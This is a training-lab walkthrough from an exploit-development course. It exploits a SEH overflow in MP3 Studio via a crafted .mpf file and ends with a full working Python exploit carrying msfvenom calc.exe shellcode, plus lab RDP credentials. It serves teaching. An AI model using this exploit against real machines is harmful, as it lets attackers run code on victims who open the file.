Scribd
Upload
52 views

Lab4 Windows SEH Overflow MP3

The document describes exploiting a SEH overflow vulnerability in MP3 Studio on Windows. It provides steps to identify the vulnerable software, attach a debugger, determine offsets, craft an exploit, and spawn calc.exe as proof of successful exploitation.

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
52 views

Lab4 Windows SEH Overflow MP3

The document describes exploiting a SEH overflow vulnerability in MP3 Studio on Windows. It provides steps to identify the vulnerable software, attach a debugger, determine offsets, craft an exploit, and spawn calc.exe as proof of successful exploitation.

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 15

© 2019 Caendra Inc.

| Hera for XDS | Windows SEH Overflow (MP3 Studio) 1


You have been tasked by your red team manager, to refresh your Windows exploit
development skills. Specifically, he provided you with a machine (172.16.172.37) that
features a vulnerable to SEH overflow version of MP3 Studio. An exploit skeleton* is also
provided to you. Your task is to fully exploit the SEH-based overflow vulnerability of MP3
Studio.

*MP3 Studio is vulnerable to a SEH-based buffer overflow via parsing .mpf files. Find below
the exploit skeleton that causes the software to crash.

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 2
• Fully exploit the vulnerable MP3 Studio software
• Spawn calc.exe as a proof of concept

• Attacking file parsing mechanisms


• Exploiting SEH-based stack overflows

• ImmunityDbg
• Mona.py
• Python
• Notepad++

• Penetration tester’s Subnet: 172.16.172.0/24

• Vulnerable machine: 172.16.172.37

• Connection Type: RDP

Username: elsadmin
Password: elsadmin1

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 3
If you are on Windows, use the mstsc command or the Remote Desktop Connection
application, and then type the IP address.

If you are on Linux, you can use a tool like rdesktop.

Note: In case of choppy RDP performance, disconnect from the VPN, edit the latest .ovpn file
and switch the protocol from udp to tcp. Then, re-connect to the lab VPN using the edited
.ovpn file.

Confirm the vulnerability by attaching Immunity to MP3 Studio and crashing the
application, utilizing the exploit skeleton.

Hint: Leverage Immunity’s “View -> SEH chain” functionality to see exactly how the SEH
structure is overwritten.

Utilize Mona’s pattern_create and pattern_offset commands to identify the offsets to


SEH and EIP.

As discussed in the course, during SEH-based overflows we have to redirect execution


past the SEH entry.

Hint: Mona can provide us with the gadgets and the proper jumps to achieve that.

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 4
During the course we have already discussed how a single bad character can corrupt a
whole exploit. Utilize the usual ASCII table within your payload and look into the
debugger for any bad characters.

Fully exploit MP3 Studio so that a calc.exe is launched.

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 5
© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 6
Below, you can find solutions for each task. Remember though that you can follow your
own strategy (which may be different from the one explained in the following lab).

Let’s start MP3 Studio and attach Immunity to it. Let’s then run the exploit and drag-drop the
generated .mpf file onto the player. We are greeted by an access violation message.

Once we pass the exception to the program, we receive the following.

It seems that we can control the EIP via an exception handler overwrite. Let’s restart the
application and attach the debugger to it. Then, let’s run the exploit once again. Now, before
passing the exception, let’s take a look at View-> SEH chain.

It’s confirmed that we can overwrite the SEH structure with “A”s. Let’s now determine the
proper offset to it.

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 7
Without closing the debugger window, let’s use Mona to create a pattern of proper length, as
follows.

Since the pattern is too long to be displayed in the console, it can be found inside the
Immunity Debugger folder as pattern.txt. By default, Immunity’s directory is:

C:\Program Files\Immunity Inc\Immunity Debugger

Let’s paste the pattern into the exploit and then provide the application with the latest .mpf
file that was generated.

After passing the exception to the program we use the displayed EIP value to calculate the
offset using mona, as follows.

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 8
So, the SEH pointer is being overwritten at offset 4116. But, we should also consider that in
the SEH structure, there is an nSEH pointer before it, and it is 4-bytes wide. We should thus
subtract 4 from the displayed value. With that said, the SEH structure is starting to be
overwritten at byte 4112. Let’s modify our exploit and confirm that calculation.

Before passing the exception into the program, let’s view the SEH chain.

It seems that we found the proper offsets. Let’s pass the exception to confirm we successfully
altered the EIP to our controlled value.

Indeed, that is the case!

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 9
Now, let’s examine the stack near the exception handler. Is there enough place for shellcode?

There’s an obstacle – the software, for some reason, splits the payload into pieces. We will
get back to this in a while, for now, let’s find a proper SEH gadget in order to redirect
execution flow to our buffer. This can be done with Mona, as follows.

The produced gadgets can be found inside the Immunity Debugger folder in file seh.txt.

Let’s choose any of them, remembering that it should originate from a module that has all
exploit protections set to false.

0x77ec9cac : pop edx # pop eax # ret

Let’s add the above gadget into our exploit instead of the current SEH pointer. Also, let’s
change the nSEH pointer (currently B’s) to breakpoints. This way, once we start executing it,
the debugger will pause letting us to know if we are on the right direction or not.

After re-generating the .mpf file and providing it to the restarted application, let’s observe
the crash. Let’s also pass the exception to the program.

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 10
Great, we have reliable code execution now. However, if we scroll down the stack to the
exception handler structure, we will find the place that we are currently executing code from.
The payload was again corrupted by some 0’s being added there.

What can we do about this?

In the classical way of SEH exploitation, the nSEH pointer is replaced with a short jump
forward in order to skip the SEH record (which was overwritten with the gadget address and
cannot be treated as a valid instruction). Usually, 6 bytes are enough. In this case, the hole in
the payload is close enough to still be in the range of a short jump. If we use a longer jump,
e.g. 32 bytes, we can still use this technique. Let’s try the following approach:

• Jump ~30 bytes forward with EB 22 (instead of the classical EB 06 instructions)


• Replace some initial D’s with NOPs, so that we don’t need to be perfectly precise
with the jump (if we land in a NOP slide, we will reach the code that resides past it).
After experimenting for a while with the payload truncation, it seems that 50 NOPs
is a reasonable value.
• Add a shellcode placeholder including a breakpoint at the end of the NOP slide, so
the debugger pauses if we are able to reach it.

After launching the latest exploit and after passing the exception to the program, we can see
that are executing code from our D-buffer.

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 11
Now, before we implement the actual shellcode, let’s check for bad characters. We will use
the standard ASCII table, as follows.

badchars =
("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"

"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\
x40"

"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"

"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"

"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"

"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"

"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"

"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

After re-loading the application, using the latest exploit file, and passing the exception to the
program, the bad char buffer should be clearly visible down the stack, right after the NOPs
and the breakpoint.

But, it’s quickly truncated after the a0 character. Let’s remove it from the bad char buffer and
try again.

This time it is truncated after \x37. Let’s continue to investigate until we are able to see full
buffer on the stack.

Finally, the bad characters were:

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 12
\x0a\x00\x0d\x37\x1a

After removing the abovementioned bad chars, we will be able to see the whole buffer.

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 13
Let’s generate a calc-spawning shellcode using msfvenom and incorporate it into exploit, as
follows.

Let’s now generate the exploit file, and launch MP3 player without a debugger attached.

Then, let’s drag-drop the exploit file onto the player. Calc should pop up if everything went
as expected.

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 14
Here’s the full exploit code.
file = "exploit.mpf"

#msfvenom -p windows/exec cmd=calc.exe -b "\x0a\x00\x0d\x37\x1a" -f c

sc = ("\xb8\xb2\x9e\x3c\x9c\xda\xd3\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"

"\x31\x83\xeb\xfc\x31\x43\x0f\x03\x43\xbd\x7c\xc9\x60\x29\x02"

"\x32\x99\xa9\x63\xba\x7c\x98\xa3\xd8\xf5\x8a\x13\xaa\x58\x26"

"\xdf\xfe\x48\xbd\xad\xd6\x7f\x76\x1b\x01\xb1\x87\x30\x71\xd0"

"\x0b\x4b\xa6\x32\x32\x84\xbb\x33\x73\xf9\x36\x61\x2c\x75\xe4"

"\x96\x59\xc3\x35\x1c\x11\xc5\x3d\xc1\xe1\xe4\x6c\x54\x7a\xbf"

"\xae\x56\xaf\xcb\xe6\x40\xac\xf6\xb1\xfb\x06\x8c\x43\x2a\x57"

"\x6d\xef\x13\x58\x9c\xf1\x54\x5e\x7f\x84\xac\x9d\x02\x9f\x6a"

"\xdc\xd8\x2a\x69\x46\xaa\x8d\x55\x77\x7f\x4b\x1d\x7b\x34\x1f"

"\x79\x9f\xcb\xcc\xf1\x9b\x40\xf3\xd5\x2a\x12\xd0\xf1\x77\xc0"

"\x79\xa3\xdd\xa7\x86\xb3\xbe\x18\x23\xbf\x52\x4c\x5e\xe2\x38"

"\x93\xec\x98\x0e\x93\xee\xa2\x3e\xfc\xdf\x29\xd1\x7b\xe0\xfb"

"\x96\x74\xaa\xa6\xbe\x1c\x73\x33\x83\x40\x84\xe9\xc7\x7c\x07"

"\x18\xb7\x7a\x17\x69\xb2\xc7\x9f\x81\xce\x58\x4a\xa6\x7d\x58"

"\x5f\xc5\xe0\xca\x03\x24\x87\x6a\xa1\x38")

buffer = "A"*4112

buffer += "\xeb\x22\x90\x90" #jump more than 30 bytes forward

buffer += "\xac\x9c\xec\x77" #0x77ec9cac : pop edx # pop eax # ret

buffer += "\x90"*50 #NOPs

buffer += sc

f = open (file, "w")

f.write (buffer)

f.close ()

print "[+] File saved as " + file

© 2019 Caendra Inc. | Hera for XDS | Windows SEH Overflow (MP3 Studio) 15

You might also like